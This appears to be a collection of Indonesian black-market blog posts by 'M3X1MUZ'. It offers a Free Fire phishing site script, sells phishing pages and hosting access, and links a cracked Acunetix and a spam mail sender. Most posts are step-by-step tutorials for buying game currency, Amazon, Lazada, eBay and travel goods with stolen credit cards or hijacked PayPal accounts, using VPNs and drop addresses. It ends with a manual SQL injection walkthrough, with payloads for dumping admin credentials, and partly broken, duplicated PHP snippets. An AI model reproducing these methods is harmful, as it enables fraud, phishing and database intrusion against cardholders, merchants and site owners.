hello bray !! balik lagi dengan saya M3X1MUZ kali ini saya ingin ngeshare Script Web Phising Game Online yang lagi Viral yaitu FreeFire ... Tanpa Basa-Basi Ayokk Kita Lokit Tampilannya seperti apa guys ^^
Screenshot Redeem Item
TAMPILANNYA GG KAN GUYS !!
LANGSUNG GASS SAJA,
LINK DOWNLOAD : Script Phisingers - SCFF-SEASON11.zip
Sekilas Info lagi GUYS...
Saya juga menerima Order Web.P,Cpanel,WHM dll
Berikut listnya :
Menyediakan Kebutuhan Hosting,Domain dll:
- Web.P ALL GAME Garansi 2 Minggu = 25k Pulsa/20k Atm
- Web.P ALL GAME Garansi 1 Bulan Full = 40k Pulsa/35k Atm
NB:
DEMO ? DISINI OM !! ELU ISI,TOLOL LU SAMPAI DNA . WEB.P DEMO DI MASUKIN :v
- Cpanel Mini = 15k Pulsa
- Cpanel Medium = 20k Pulsa
- Cpanel Unlimited = 25k Pulsa
- WHM Mini = 30k Pulsa
- WHM Medium = 40k
- WHM Extra = 50k ( Buy 2 95k )
- WHM Super = 60k ( Buy 2 100k )
NB:
Server Lanjay !! Layanan kami mokad,kami ganti baru sesuai dengan Rules ( Unlimited Claim ) + Untuk Pembelian di Atas 100k,Free Bonus
UNTUK PEMESANAN,BISA HANGOUT SAJA YAH GUYS 👍
Sekilas Info lagi GUYS...
Saya juga menerima Order Web.P,Cpanel,WHM dll
Berikut listnya :
Menyediakan Kebutuhan Hosting,Domain dll:
- Web.P ALL GAME Garansi 2 Minggu = 25k Pulsa/20k Atm
- Web.P ALL GAME Garansi 1 Bulan Full = 40k Pulsa/35k Atm
NB:
DEMO ? DISINI OM !! ELU ISI,TOLOL LU SAMPAI DNA . WEB.P DEMO DI MASUKIN :v
- Cpanel Mini = 15k Pulsa
- Cpanel Medium = 20k Pulsa
- Cpanel Unlimited = 25k Pulsa
- WHM Mini = 30k Pulsa
- WHM Medium = 40k
- WHM Extra = 50k ( Buy 2 95k )
- WHM Super = 60k ( Buy 2 100k )
NB:
Server Lanjay !! Layanan kami mokad,kami ganti baru sesuai dengan Rules ( Unlimited Claim ) + Untuk Pembelian di Atas 100k,Free Bonus
UNTUK PEMESANAN,BISA HANGOUT SAJA YAH GUYS 👍
New Phising FF 2019 Fresh Versi Dragon Slayer
ACUNETIX WEB VULNERABILITY SCANNER FULL CRACK
Deskripsi
Acunetix web vulnerability Scanner adalah digunakan untuk mngetahui celah suatu Website seperti SQL Injection, Cross Site Scripting, Upload files, XSS attack, dll. Dan software ini dapat menguji keamanan suatu website secara otomatis dengan mengaudit website dengan memeriksa kerentanan hacking untuk dieksploitasi.
Informasi Software
Nama file : Acunetix Web Vulnerability Scanner 9
Versi : 9.0
Size : 35,5 MB
Developer : Acunetix Ltc
Support on : win xp,7,8,10 100% work
ScreenShot
Link Download
Acunetix+Crack v10.5
Password Rar : [gagaltotal666]
jika kalian ingin membeli original software nya anda kunjungi saja website resmi nya,
di website resmi nya Acunetix ini ada yang free juga tetapi cuma batas waktu
trial 14 day atau 14 hari, kalau versi crack ini kita bisa memakai Acunetix sepuas kita
kalau punya uang anda jangan tanggung beli saja original dan hargai Developer nya ^_^
trial 14 day atau 14 hari, kalau versi crack ini kita bisa memakai Acunetix sepuas kita
kalau punya uang anda jangan tanggung beli saja original dan hargai Developer nya ^_^
Link Download Website Resmi Acunetix
Klik gambar dibawah
ACUNETIX WEB VULNERABILITY SCANNER FULL CRACK
hello bray !! balik lagi dengan saya M3X1MUZ kali ini saya ingin menyampaikan bahwa Priv M3X - S3ND3R V.1 sudah Launching ... Tanpa Basa-Basi Ayokk Kita Lokit Fitur2 M3X - S3ND3R ^^
fitur-fitur di dalam Priv M3X - S3ND3R V.1 =
> Support Send All Mail ( Yahoo,Gmail,Hotfams,Aol dll ) Untuk Hotfams Awto Tembus 1000% yah !!
> Send Mail Delay 10 mail/Sec !!
> Free Still Awto Inbox ( Bisa Request ) !!
> Support Encrypt Subject dll !!
> Support OS Android !!
> Dll
Screenshot M3X - S3ND3R V.1
Screenshot M3X - S3ND3R Send Hotfams Awto Tembus 100%
Keren bukan ^^
Untuk Informasi Pemesanan M3X - S3ND3R bisa Hubungin Fatur Rochman Admin OCBM yahh !!
#M3X_S3ND3R
#Priv_Sender
#M3X1MUZ
Priv M3X - S3ND3R V.1
Hello Bray,balik Lagi dengan Saya Kang Admin ^^ Saya ingin menyampaikan yahh ... Saya Sudah Vakum Tapi Kalian jngn Khawatir Bray . Saya masih akan tetap Sharing Ilmu biar Barokah :v
Cara Top UP Diamond Mobile Legend via CC by M3X1MUZ :
Bahan2 :
> 1 akun ML Tumbal
> Akun VPN Berbayar
> CC ( USA Fresh ) Country Mix
Step by Step :
> login VPN Berbayar anda ( Utamakan IPVanish/VIP72 ) sesuaikan dengan Country/Negara CC tadi
> Login Akun Gmail & Change Payment ke $ ( Dollar ),setelah di ubah Lanjut login ke Aplikasi Mobile Legends ( VPN Jangan di Disconnected/dimatikan,biarkan Saya Running sampai Step Akhir Bray )
> Setelah Login,silakan Klik Menu Diamond untuk membelinya ( silakan kalian Test pembelian Diamond dari Harga tertinggi sampai terendah )
> Jika menu payment/pembayaran sudah keluar Klik Pembayaran via Credit Card/Debit Card
> Form Pembayaran/info Billing & cc keluar ( silakan input Informasi CC Fresh hasil spam tadi di form tadi & nomor telfon isi mengunakan fake no telfon USA/negara sesuai Informasi CC tadi ) terus Klik Bayar
> Tunggu sampai Proses Payment Has Been Sukses Keluar yahh brayy ^^ ( jika Erorr/Gagal silakan Ganti CCnya dengan yg lain .. sampai Pembayaran nya Sukses ) & Cek Diamond ML kalian biasanya Proses 5-15 menit langsung Crot ^^
> Jika Diamond ML kalian sudah terisi,Silakan Lanjutkan Proses Send Skin ke Akun Real Kalian ( Ingat VPN jgn di Disconnected sampai Akun ML Kalian berubah )
> Setelah Akun berubah silakan Lanjutkan ask for Skin dari Akun Tumbal Kalian tadi ^^
> Proses Done !!
✓Kegagalan dalam Pembayaran Gagal :
1. CC sudah pernah Kepakai untuk Top UP/Limit CC tidak mencukupi & bisa saja CC sudah Mati ( tidak bisa di gunakan lagi )
Info :
Method ini berlaku untuk semua Layanan/Pembayaran dari Google atau Play store Yahhh !!
Salam,
#Method_By_M3X1MUZ
#Admin_Official_Clay_BlackMarket
Cara Top UP Diamond Mobile Legend via CC by M3X1MUZ :
Bahan2 :
> 1 akun ML Tumbal
> Akun VPN Berbayar
> CC ( USA Fresh ) Country Mix
Step by Step :
> login VPN Berbayar anda ( Utamakan IPVanish/VIP72 ) sesuaikan dengan Country/Negara CC tadi
> Login Akun Gmail & Change Payment ke $ ( Dollar ),setelah di ubah Lanjut login ke Aplikasi Mobile Legends ( VPN Jangan di Disconnected/dimatikan,biarkan Saya Running sampai Step Akhir Bray )
> Setelah Login,silakan Klik Menu Diamond untuk membelinya ( silakan kalian Test pembelian Diamond dari Harga tertinggi sampai terendah )
> Jika menu payment/pembayaran sudah keluar Klik Pembayaran via Credit Card/Debit Card
> Form Pembayaran/info Billing & cc keluar ( silakan input Informasi CC Fresh hasil spam tadi di form tadi & nomor telfon isi mengunakan fake no telfon USA/negara sesuai Informasi CC tadi ) terus Klik Bayar
> Tunggu sampai Proses Payment Has Been Sukses Keluar yahh brayy ^^ ( jika Erorr/Gagal silakan Ganti CCnya dengan yg lain .. sampai Pembayaran nya Sukses ) & Cek Diamond ML kalian biasanya Proses 5-15 menit langsung Crot ^^
> Jika Diamond ML kalian sudah terisi,Silakan Lanjutkan Proses Send Skin ke Akun Real Kalian ( Ingat VPN jgn di Disconnected sampai Akun ML Kalian berubah )
> Setelah Akun berubah silakan Lanjutkan ask for Skin dari Akun Tumbal Kalian tadi ^^
> Proses Done !!
✓Kegagalan dalam Pembayaran Gagal :
1. CC sudah pernah Kepakai untuk Top UP/Limit CC tidak mencukupi & bisa saja CC sudah Mati ( tidak bisa di gunakan lagi )
Info :
Method ini berlaku untuk semua Layanan/Pembayaran dari Google atau Play store Yahhh !!
Salam,
#Method_By_M3X1MUZ
#Admin_Official_Clay_BlackMarket
Cara Top UP Diamond Mobile Legend via CC ( Payment Google ) by M3X1MUZ
Kembali lagi dengan saya selaku Admin Official Clay BM yang paling Baik sejagat Tuyul ...
Oke,kali ini saya akan Sharing New Method Ekse Site Amazon @Recode By M3X1MUZ !!
Peraturan2 Official Clay BM :
1. Jangan pernah lupa Dengan GURU Kalian,walaupun lupa juga gpp :D
2. Semua materi yang di berikan jangan pernah di PERJUAL-BELIKAN
3. Sering2 lah BerExperime ( Temukan lah Methodmu = jadikan lah Ladang Penghasilan mu )
Okey,tanpa basa-basi lagi ... Tolong kalian nyimak baik2 & jangan lupakan 1 Step pun ... Jika kalian melupakan 1 step = Resiko tanggung sendiri !!! Kalau saya yang nanggung gpp :D nanggung barang hasilnya maksudnya ^_^
Oke,kali ini saya akan Sharing New Method Ekse Site Amazon @Recode By M3X1MUZ !!
Peraturan2 Official Clay BM :
1. Jangan pernah lupa Dengan GURU Kalian,walaupun lupa juga gpp :D
2. Semua materi yang di berikan jangan pernah di PERJUAL-BELIKAN
3. Sering2 lah BerExperime ( Temukan lah Methodmu = jadikan lah Ladang Penghasilan mu )
Okey,tanpa basa-basi lagi ... Tolong kalian nyimak baik2 & jangan lupakan 1 Step pun ... Jika kalian melupakan 1 step = Resiko tanggung sendiri !!! Kalau saya yang nanggung gpp :D nanggung barang hasilnya maksudnya ^_^
- VERSI CC/CREDIT CARD
- STEP 1 = KONEKSINKAN VPN SESUAI COUNTRY CC KALO BISA,KOTANYA + JAM DI SETTING DLU DAN JANGAN LUPA CEK DI WHOIS.NET IP ADDRESS BILA SUDAH 100% LANGSUNG GASS SAJA BRAYY :D
- STEP 2 = BUAT AKUN AMAZON BARU DULU, KALO UDAH LOGIN ... LANJUT STEP BERIKUTNYA ^_^ JANGAN BALIK KE STEP PERTAMA ..
- STEP 3 = CARI BARANG YANG LU INGINKAN BRAYY USAHAKAN JANGAN YANG BERLOGO PRIME YAA :* TAKUT NANTI YG DATANG PAKPOL ..
- STEP 4 = PILIH SELLER DENGAN RATING PALING RENDAH SAMPAI SEDANG (JANGAN PILIH YANG BESAR) KECUALI KALO FAKTOR FACE MENDUKUNG YANG BESAR MAU SHIP INDO ...
- STEP 5 = TANYAKAN DULU,SELLER MAU CHANGE ADDRESS KE INDONESIA DENGAN ALASAN BUAT HADIAH ATO LU PINDAH RUMAH ATAU MAU NGASIH KE GUA :D WOKWOKWOK
- STEP 6 = TUNGGU BALASAN EMAIL, KALAU DIBALAS BISA CHANGE ADDRESS LANGSUNG LANJUT GASS SAJA ...TAPI JANGAN BIKIN SELLERNYA BANGKRUT !!!
- STEP 7 = SIAPKAN CC BESERTA INFONYA
- STEP 8 = BUAT EMAIL DENGAN IDENTITAS SAMA SEPERTI CC, MISALNYA ( CARD HOLDER M3X1MUZ CLAY BM ) BERARTI LU BIKIN EMAIL M3XIMUZCLAY@IKEHIKEH.COM ATO YANG LAINNYA ... SESUAIKAN DENGAN SELERA YAHH BEB :*
- STEP 9 = LOGIN AKUN AMAZON BARU DENGAN EMAIL YANG BARUSAN LO BIKIN ATAS NAMA BULE TADI, JANGAN MAKE NAMA GUA YAHH BEB ...
- STEP 10 = BUKA LINK SELLER BARANG TADI, KEMUDIAN PLACE ORDER
- STEP 11 = TUNGGU TULISAN NOT YET MENJADI PREPARE, JANGAN MATIKAN VPN LU KARENA ITU BERPOTENSI NGERUBAH IP DAN MEMBUAT AKUN CEPAT KE LOCK ( PAHAM KAN ? KALAU KGA,NGOPI DLU LAH BIAR PAHAM )
- STEP 12 = SETELAH PREPARE SAATNYA LU KONTAK SELLER CHANGE ALAMAT PENGIRIMAN DENGAN FORMAT:
- NAME :
- ADDRESS :
- CITY :
- STATE :
- COUNTRY :
- POS CODE:
- NO PHONE:
- MISAL =
- HELLO BEBE,I WANT TO CHANGE MY SHIP #INVOICEBARANG THIS IS THE ALAMAT DROPPER LU ) LANGSUNG MASUKIN FORMAT ALAMAT ITU YG DI ATAS TADI ... KALAU BISA SIH MASUKIN ALAMAT DROPPER GUA :D WOKWOKWOK
- STEP 13 = TUNGGU BALASAN DARI SELLER DAN TUNGGU BARANG SHIPPED KE ALAMAT DROPPER LU
- STEP 14 = DONE !!! SELAMA BARANG AWTO KE ALAMAT DROPPER,MENDING NGOPI DLU ... BIAR KGA PANIKKK
UNTUK VERSI ACC AMAZON,HAMPIR SAMA YAHH BRAYY ... YG MEMBEDAKAN :
ACC AMAZON = AKUN AMAZON
CC = BUAT AKUN DLU
OKEYY,SEKIAN TUTORIAL DARI SAYA ... KALAU KURANG PAHAM BISA BERTANYA DI GRUP FB OFFICIAL CLAY BM SAJA :* JANGAN LUPA SUBSCRIBE BLOG SAYA,BIAR KALAU SAYA ADA POSTINGAN BARU ... KALIAN LANGSUNG DAPAT PEMBERITAHUANNYA !!
SALAM,
M3X1MUZ
Hastag #Amazon #AMAZON #METHOD #Method #METHODE #Methode #Teknik #TEKNIK #New #NEW #2K18 #2018
TUTORIAL ORDER AMAZON BY M3X1MUZ
Kali ini saya akan memposting sebuah materi mungkin bermanfaat, tanpa basa-basi kita langsung Gass!!
Bahan:
1. Siapin Akun Lazadanya
2. Siapin VPN Sesuai country ccnya
3. Siapin CC ASIA LIVE+NO Extrap (Dilarang Keras Pakai CC Indo)
STEP BY STEP :
1. Hidupkan VPN sesuai country CC-Nya
2. Login/Sign Up Lazada
3. Pilih receh dulu, kalau bisa boleh ke yang gede
4. Checkout, masukin data CC-Nya
NB:
1. Saat Checkout dan gagal ada 2 kemungkinan
>CC NYA DEAD
>CC LIVE TAPI LIMIT TIDAK MENCUKUPI OR LOW
2. CC ga ada yang namanya HB(High Balance), yang ada cuma HL(High Limit)
3. Kalau ada yang jual CC bilang CC-Nya HB (LOL Aja pacman emotikon )
4. CC gak ada yang berballance Gan yang ada cuma Limit pemakaian. Kecuali type DEBIT < Ini berbalance, sama seperti kartu DEBIT yang kamu pakai
Salam,
~X~ M3X1MUZ ~X~
Methode Lazada | ~X~ M3X1MUZ ~X~
Method Ebay lngsung ship indo
Bahan-Bahan :
1. pke PP AU/UK HC confirmed+verif (soalnya dah tested sma sya)
2. Pke VPN/IP Country PP nya (biar ga SM)
3. Siapin Kopi biar santai
Step By Step :
1. clear cache brwoser ampe bersih, bru masuk ebay.com cari brang
2. plih buy it now-worldwide shiping/international free shipping
3. buy it now, Guest CO/Signin terserah tpi recomend Guest CO ajh
4. Isi alamat kita si shipping adrres nya smpe masuk ke pay with paypal account.
5. pay ajh pke pp nya tadi, smpe succes, klo ga succes (RTM/SM itu faktor face
)
6. succes order 1x masuk ke paypal. com login'n akun pp tadi yang udah pke 1x
7. Ganti Pw PP nya,primary emailnya, smpe disni dah cukup aman.
8. klo mau dipke lagi pke lagi smpe PP nya limit like emotikon
9. kalo dah puas CO masuk ke paypal. com lagi terus close akun ampe beres.
10. dan aman dah orderan kita sunglasses emotikon udah paid tinggal tunggu shipped like emotikon
Info kita tetap terjaga aman, karena akun paypalnya dah di closed.
Salam,
~X~ M3X1MUZ ~X~
Bahan-Bahan :
1. pke PP AU/UK HC confirmed+verif (soalnya dah tested sma sya)
2. Pke VPN/IP Country PP nya (biar ga SM)
3. Siapin Kopi biar santai
Step By Step :
1. clear cache brwoser ampe bersih, bru masuk ebay.com cari brang
2. plih buy it now-worldwide shiping/international free shipping
3. buy it now, Guest CO/Signin terserah tpi recomend Guest CO ajh
4. Isi alamat kita si shipping adrres nya smpe masuk ke pay with paypal account.
5. pay ajh pke pp nya tadi, smpe succes, klo ga succes (RTM/SM itu faktor face
)6. succes order 1x masuk ke paypal. com login'n akun pp tadi yang udah pke 1x
7. Ganti Pw PP nya,primary emailnya, smpe disni dah cukup aman.
8. klo mau dipke lagi pke lagi smpe PP nya limit like emotikon
9. kalo dah puas CO masuk ke paypal. com lagi terus close akun ampe beres.
10. dan aman dah orderan kita sunglasses emotikon udah paid tinggal tunggu shipped like emotikon
Info kita tetap terjaga aman, karena akun paypalnya dah di closed.
Salam,
~X~ M3X1MUZ ~X~
Method Ebay lngsung ship indo | ~X~ M3X1MUZ ~X~
Method Order Fiverr
BAHAN-BAHAN :
- VPN, gratis gk masalah
- PP
- akun fiverr
1. Buka fiverr.com
2. Pilih item
3. Add to cart
4. Clear cache + cookies
4. Buka fiverr
5. view cart
6. CO
7. pay pake CC bekas, CC dead gk masalah
( http://i.imgur.com/CEr9HU0.png ) . kan ada tulisan error ( http://prntscr.com/a9pyiy ). ganti pay pake pp ( http://prntscr.com/a9axbm )12. Sukses http://prntscr.com/a9pwgi
Salam,
~X~ MEXIMUZ ~X~
Method Order Fiverr Via PayPal | ~X~ MEXIMUZ ~X~
saya membuat postingan ini karena banyak yang bertanya bagimana cara CO Maskapai & hotel...
Tanpa basa basi kita langsung mulai saja :)
Site Nusatrip.com + Tiket.com smile emotikon tiap book disitu selalu & blm pernah Refund / VOID
tempat reservation tiket pesawat & voucher hotel.
VPN WAJIB.
tempat reservation tiket pesawat & voucher hotel.
VPN WAJIB.
Step by Step :
- pilih hotel voucher / tiket pesawat
- pilih tnggal
- nama traveler
- pas bagian kolom isi nama kontak yg punya CC , nomor hp nya samain dgn yg punya CC tetapi nomer ujung nya ganti misalnya 08xxxxx812 menjadi 08xxxxx81(9) jangn lupa negara nya smain.
- isi pay CC .
Clue : biasanya nusatrip suka BIN negara aneh BIN langka kyk negara Bosnia and Herzegovina / ANZ. smile emotikon
tested by me : CC Canada Royal Bank of Canada & CC Bosnia and Herzegovina.
Happy Travel ^_^
Salam,
~X~ M3X1MUZ ~X~
METHODE ORDER TIKET PESAWAT DAN TIKET HOTEL | ~X~ M3X1MUZ ~X~
Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. (Wikipedia)
SQL injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.
SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input. (de-kill.blogspot)
Untuk mempermudah dalam praktek SQL Injection ini, maka bisa menggunakan tools berikut:
1. BSQL Hacker
Dikembangkan oleh Portcullis Labs, BSQL Hacker adalah SQL injection yang di rancang untuk mengeksplor hampir seluruh jenis data base
[DOWNLOAD BSQL HACKER] 
2. The Mole
Mole adalah tool open source, Mole dapat melewati beberapa sistem IPS / IDS yang menggunakan filter generik, mole dapat meng eksplor hanya dengan menggunak URL yang rentan dan string valid.
3. Pangolin
Diproduksi oleh perusahaan yang sama yang membuat JSky, NOSEC, Pangolin adalah tool injeksi SQL secara menyeluruh pada web dengan user-friendly GUI dan support hampir untuk selur data base.
[DOWNLOAD PANGOLIN]
4. SQLMap
SQLMap adalah tool open source yang di jalankan menggunakan command dan support untuk data base MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.
[DOWNLOAD SQLMAP]
5. Havij
Tool ini sudah sangat terkenal di gunakan oleh para peretas di seluruh dunia, Havij di kembangkan oleh programer iran dengan GUI yang sederhana meng injek SQL menggunakan harvij kemungkinan berhasil adalah 95 persen dan masih banyak lagi kelebihan havij.
[DOWNLOAD HAVIJ]
6. Enema SQLi
Berbeda dengan kebanyakan tool-tool injek yang di buat otomatis, enema bukanlah tool otomatis, enam tool yang di namis yang memang di rancang untuk profesional.
[DOWNLOAD ENEMA SQLI]
7. SQL Ninja
Sql Ninja di kembangkan oleh icesurfer tool yang di rancang untuk targen server SQL, data base fingerprint, dan semu kemampuan untuk mengendalikan database yang rentan injek.
[DOWNLOAD SQL NINJA]
8. SQL Sus
Sql Sus merupakan tool open source antar mukanya berbasis perintah, anda dapat mengambil data base, mendownload file dari data base server dan masih banya lagi.
[DOWNLOAD SQL Sus]
9. Safe SQL Injector
Safe SQL Injector terkenal dengan kemudahan penggunaannya Safe3 SI menawarkan serangkaian fitur yang memungkinkan deteksi otomatis dan eksploitasi kelemahan SQL injection dan pengambilalihan database server.
[DOWNLOAD SAFE SQL INJECTOR]
10. SQL Poizon
SQL Poizon memanfaatkan mesin pencarian Dork untuk menjaring situs-situs yang rentan untuk di injek. Sql Poizon memiliki browser yang telah terintegrasi di dalamnya.
[DOWNLOAD SQL POIZON] Manual Tutorial SQL Injection
Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ‘ atau –
comments: /* atau —
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x
karakter: ‘ atau –
comments: /* atau —
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x
[ Langkah 1 ]
- Carilah target
Misal: [site]/berita.php?id=100Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100’ atau
[site]/berita.php?id=-100
Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Langkah 2 ]
- Mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah: order byContoh:[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*Ceklah secara Langkah by Langkah (satupersatu)…
Misal:[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–Sehingga muncul error atau hilang pesan error…
Misal: [site]/berita.php?id=-100+order+by+9–Berarti yang kita ambil adalah sampai angka 8
Menjadi [site]/berita.php?id=-100+order+by+8–
[ Langkah 3 ]
- untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–ok seumpama yg keluar angka 5gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–Lihat versi yang digunakan se’umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Langkah 4 ]
- Untuk menampilkan table yang ada pada web tersebut adalah
perintah table_name >>> dimasukan pada angka yangg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhirCode:[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–Se’umpama table yang muncul adalah “admin”
[ Langkah 5 ]
- untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. tables+where+table_schema=database()–
[ Langkah 6 ]
- Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa–Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
Website yg digunakan untuk konversi :http://www.v3n0m.net/ascii.htmContoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E–
[ Langkah 7 ]
- Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan caraperintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhirContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–Contoh kata yang keluar adalah id,username,passwordContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–
[ Langkah 8 ]
- Tahap terakhir mencari halaman admin atau login.
Source HN Forum
SQL Injection adalah salah satu teknik yang sering di gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan seseorang dapat login tanpa harus memiliki akun di sebuah web site Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database bahkan pula dapat mematikannya.
Contoh Sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Contoh sintaks SQL Injection
1) Sintaks SQL string ‘– setelah nama username
1) Sintaks SQL string ‘– setelah nama username
Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
1. Merubah script php
Contoh script php semula :
$query = “select id,name,email,password,type,block from user ” .
“where email = ‘$Email’ and password = ‘$Password'”;
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”;
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Contoh script php semula :
$query = “select id,name,email,password,type,block from user ” .
“where email = ‘$Email’ and password = ‘$Password'”;
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”;
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :
$query = “select id,name,email,password,type,block from user”.
“where email = ‘$Email'”;
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”;
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));
2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
$query = “select id,name,email,password,type,block from user”.
“where email = ‘$Email'”;
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”;
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));
2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
